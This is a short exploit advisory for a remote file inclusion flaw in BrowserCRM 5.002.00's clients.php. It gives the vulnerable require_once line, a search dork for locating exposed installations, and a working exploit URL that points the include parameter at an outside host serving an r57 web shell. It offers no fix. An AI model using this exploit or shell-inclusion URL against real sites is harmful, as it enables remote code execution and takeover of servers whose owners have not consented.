BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability

2008-06-08 00:00:00

script: browsercrm-5.002.00 remote file including

Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz

dork: Copyright © 2007 BrowserCRM Ltd

Vuln Code :

require_once($bcrm_pub_root . "/public_prepend.inc.php")


exploit:

www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?


Author: ahmadbady | [email protected]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.